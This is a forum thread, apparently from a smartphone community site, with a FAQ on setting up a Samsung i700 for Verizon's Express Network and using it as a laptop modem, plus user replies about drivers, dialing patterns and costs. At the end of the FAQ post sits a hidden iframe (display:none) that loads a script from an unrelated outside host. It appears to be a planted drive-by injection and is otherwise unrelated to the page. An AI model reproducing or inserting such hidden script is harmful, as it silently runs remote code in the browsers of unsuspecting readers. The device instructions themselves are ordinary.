+ Reply to Thread

How do I connect my I700 to Verizon's Express Network and use it as a modem?

Verizon ships the Samsung I700 ready to connect to the Express Network, with all the proper default settings. If you happen to modify your settings, these are the defaults you'll need.

First, click on Start/Settings then tab to the Connections page and click on the Connections icon. Click the Modify button under the top prompt, "When needed, automatically connect to the Internet using these settings:"

Tap the Express Network entry. On the first page, the entries should read:

Enter a name for the connection: Express Network
    Select a modem: Cellular Line
    Baud rate: 19200 (does not matter)

Leave the Advanced pages alone and click Next. If you have modified the Advanced pages in the past, reset them to 8-none-1-hardware, with the terminal checboxes unchecked, TCP/IP set to User server-assigned IP address, and Name servers set to Use server-assigned addresses.

On the second basic page, set your country code to 1, enter your area code, and use #777 as the phone number. Click Finish. Back at the Connections page, if you switch to the Dialing Locations page, choose the location "Mobile" and ensure it also has your area and country code, tone dialing, and no call waiting disablement. With the Mobile dialing location selected, click the Dialing patterns button and ensure that Mobile's patterns are set to the default of G for local, FG for long distance and EFG for international. Since #777 is treated as a local call, it will be dialed without any prefixes.

Now anytime you need an Internet connection, your I700 will access Express Network for you automatically.

If you further want to use your I700 as a CDMA modem for a laptop, you will first download the CDMA Modem
    drivers located here.

Install the drivers on your laptop before you attempt to connect your i700 as a modem. Ideally, you will want to connect your I700 for ActiveSync successfully before attempting to use the i700 as a modem.

Disconnect your I700 from your laptop, and click on Start/Settings/System/USB and choose External Data Call. You can also jump to this page quickly by clicking the modem icon to the left of the TX/RX bars on the Today screen.

Once you set the i700 USB to a data call, and you have already preinstalled the CDMA modem drivers, connect the i700 to your laptop. Now, even though your i700 was once discovered as a USB device for ActiveSync, your Windows computer will now re-detect the i700 as a CDMA modem. Once this process is complete, you can move on to setting up a network connection.

Since the I700 is a CDMA modem, you will not be able to use it to connect to any data networks other than CDMA networks. For example, you cannot access a traditional dialup service directly since the i700 is not capable of negotiating an analog v.90 connection.

The following information is based on Windows XP. For the steps that follow, be sure your I700 is connected to your laptop throughout the process. On your laptop, open Network Connections and create a new connection. Indicate that the connection connects to the Internet, and select the choice that you will configure the connection manually and connect using a dialup modem.

On the next page, select the Samsung I700 CDMA Modem as the device for the connection and click Next. Enter a meaningful name for the connection such as Verizon Wireless and click Next. Enter #777 as the phone number and click Next.

In the username field, enter yourphonenumber@vzw3g.com with no punctuation, and omit the leading 1. Enter vzw as the password. If you can connect your computer to networks in multiple ways, you will most likely want to uncheck the option to make this connection the default and use this username and password for all users. Click Next, then Finish. Now, you can test your connection by clicking the Dial button. You should now be online. Keep in mind that if your Express Network access is billed from plan minutes, you will use minutes while your laptop is online.

Once you no longer need Internet access for your laptop. you can right-click on the networking icon in the Windows XP tray and choose disconnect. This will automatically disconnect the i700 and hang up the call. You do not need to further click the hang up button on the i700.

Remember, before you try to ActiveSync next time, set the USB setting back to ActiveSync.

Information for this FAQ came from a variety of sources, including What are your EN Connection Settings?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Angry No dial tone

Everything went pretty much as described and the modem is installed and working fine on my laptop but when I try to establish a connection, I get the error message -- No dial tone.

I am new to the i700 world and would appreciate any insight on what could be the problem. Thanks

Andre

sorry aetherly, cant help you there yet. im still downloading the drivers, im on vacation and only got 56k . But I have a tip so you don't have to go to start>settings>system>USB all the time just to switch from Sync to External. Just click on the Tx/Rx meters on the today screen (desktop if you want to call it for you newbies) and then you will be taken to the Sync to External thing in just ONE click!!
    digx

Smile Got it to work

Regarding my previously reported problems -- no dial tone -- I got it to work. I had to uninstall and reinstall the software. This time it added the CDMA modem instead of just the Agere Systems AC'97 modem. But even after this reinstall the CDMA modem didn't install correctly so I got the big ? in the device manager. From there I went to the device manager, opened the CDMA modem and reinstalled the driver just for the CDMA modem from inside device manager and I was online in a jiffy. I have tested my connection speed and I am getting between 120k and 140k so I am very satisfied. I love the i700 but the reference manual and documentation doesn't help much at all. You had better have some technical skills if you are going to get this to work.
    Over and out.

Unhappy

anyone have this problem, I am using I700 as moden for my dell 8100 with win xp pro since june and it's working fine... I jsut get my new toy, hp zd7000 with win xp media center edition( special xp pro) with DVD burner, 1G ram and 17" screen...... but I CANNOT install the driver and make it work.... it will instal the first driver then the second one with freeze...... and I had to hit the switch..... I can also install the driver on my tablet pc from HP and make it work as well... any suggestion????????

Damn, the last leg of the driver install locks up my i700 every single time. Windows XP Pro laptop. Grrrr..

Any ideas?

Using i700 As Modem

I have a desktop with WIN 98 & i'm try'n to access the "network connection"......how do you get to that?

Also, i haven't got'n the i700 yet but installed the modem driver in the desktop. i'm try'n to look for the i700 in Device Manager but can't find it. do i have to have the i700 hooked up to see it in the device manager? ....also, where would it be the i700 be under unde anyways in the device manager list?

Thanks for all the help.u guys r do'n great!! wow...it's what makes america so wonderful!!!
    Just Because you don't believe doesn't mean it isn't true

I did get my i700 to work as modem after the instruction in FAQ... one advice... sometimes it freeze up the i700 and the laptop especially if you tak the phone out from the cradle while you are in date mode( when you are using the modem)... if this happen soft reset the i700 and reconnect it...it will take care any problem..... for win 98... i have not use it fro a while but if you connect i700 and look for new device and install driver you should be OK.... down load the driver from FAQ... my original driver was from somewhere ekse and it did not work from my new latop ( HP ZD 7000 w HT 3.2G P4) but the one from FAQ work like a charm...I am using it to post (free N WKend) you may see it as unknow USB device and install the driver as in FAQ...god luck
    Last edited by ruppok; 12-28-2003 at 09:05 PM.

Largely Converged Member av8instyle's Avatar
    "access denied because the user name/password is invalid on the domain".

This is the message I got after successfully installing the drivers and successfully connecting the laptop to the i700.

Any ideas?

Has anyone tried this w/ quick2net? I have been trying to 2 hrs and not having any luck. I used the directions above but dropped the username/password (as far as I know it's not required for quick2net) and change the number to #7772

no luck.

Any ideas?

Thasnk!

Tfunk

user = qnc
    password = qnc

Just went through this whole procedure, but keep getting an invalid user name or password when I attempt to connect.

Are the above settings still correct? If so, does anyone have any thoughts about what I might be doing wrong or need to correct to us the i700 as a CDMA modem with my laptop?

By above, I mean the instructions provided by Sleeve in the very first post.

Thanks

cdma modem connecting to express network

I just talked to verizon tech support and got some good tidbits.

1) The direct number to the "Mobile web professionals pool" is (866) 788-9387, option 2, 2, and then 1

2) as opposed to information posted earlier, I was told that under settings/connections/dialiing locations/dialing patterns, all three (local, long distance, international) need to be set to just "G". This solved an invalid password problem I was having.

3) for better connection strength, go to the phone program, dial *228 (send) and when the operator comes on choose option 2. Then wait. Apparently this alerts the nearest tower to your location or something like that. It improved my connection.

My eternal thanks to the many who have posted here previously and saved me endless headaches!!!

-Zoe

Also, I think there is another thread on this that has additional information, including what I learned upon contacting vzw.

Here:

Using i700 as a modem
    Last edited by Lookoutpi; 06-15-2004 at 08:10 PM.

Smile I700 as modem for Tablet PC

Thanks to all who formulated the answers on using the I700 as a modem. I used it today (and am using it now) for my Tablet PC (running the Tablet version of XP), following the instructions in these threads, and had no problems. I'm showing a 230K connection speed and it is blazin'. Thanks again.

DONT USE AS A MODEM

I HAVE BILL FOR $29 000 FOR ONE MONTH OF USE . DATA PLAN MUST BE ON FOR 44.99 UNLIMITED